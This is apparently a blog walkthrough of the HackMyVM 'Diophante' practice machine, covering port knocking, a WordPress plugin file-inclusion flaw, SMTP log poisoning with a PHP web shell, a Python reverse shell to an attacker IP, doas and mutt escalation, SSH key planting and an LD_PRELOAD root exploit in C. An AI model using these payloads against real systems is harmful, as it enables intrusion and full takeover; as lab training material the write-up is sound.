HackMyVm Diophante Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Diophante


Scan ports, noticed port 25 maybe open, it's smtp service.

nmap -sV -sC -p- -oN ports.log 192.168.56.100

图片.png


Dir scan port 80.

图片.png


Check note.txt, it's a hint about knock-knock.

图片.png


Do knock-knock.

knock 192.168.56.100 7000 8000 9000


Scan ports again, the port 25 is now open.

图片.png


In /blog folder, check source code, we need to add "hard" to /etc/hosts.

图片.png


Then we can correctly visit the wordpress blog.

Use wpscan to check the wordpress blog.

wpscan --url http://hard/blog -e u,p --no-banner


图片.png


It's a classic wordpress plugin vuln. Search exploitdb for the poc code.

图片.png


Check if the LFI is ok.

~ curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' --output -
root:x:0:0:root:/root:/bin/bash
...
sabine:x:1000:1000:sabine,,,:/home/sabine:/bin/rbash
...
leonard:x:1001:1001:,,,:/home/leonard:/bin/bash
...

Now we need to get reverse shell. Remember we have smtp open, so we can send a mail to sabine or leonard, with shell code in it, then use LFI to include it.

We use nc to connect port 25, and send a mail to leonard.

~ nc 192.168.56.100 25  
220 debian ESMTP Postfix (Debian/GNU)
helo somebody
250 debianmail from:"somebody"
250 2.1.0 Ok
rcpt to:leonard
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["pass"]) ?>
.
250 2.0.0 
Ok: queued as 0F4BE802CC
quit
221 2.0.0 Bye


Check if our shell code works.

curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=id' --output -

图片.png


Now we can use nc to listen at some port, then get reverse shell by visit:

http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'图片.png


Check SUID file. xclip is rabbit hole (I spent a lot time on it :P) ,we need doas.

图片.png


Check doas.conf.

图片.png


Now we can escalate to user sabine from www-data.

doas -u sabine /usr/bin/setsid bash


图片.png


We upload id_rsa.pub to /home/sabine/.ssh/authorized_keys, then we can login ssh as sabine, remember to add '-t "bash --noprofile"'.

图片.png


Next step is also use doas to escalate to user leonard.

Mutt is a email client. In mutt, press "m" to write a mail, and when writing the content the the mail, we get nano. So we can use nano to get a shell.

图片.png

图片.png


Upload id_rsa.pub again, we get full ssh terminal.

图片.png


Sudo -l, notice the LD_PRELOAD.

图片.png


In /tmp folder, create pwn.c with code below.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Compile it to pwn.so.

gcc -fPIC -shared -o pwn.so pwn.c -nostartfiles

图片.png


Last step is to get root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2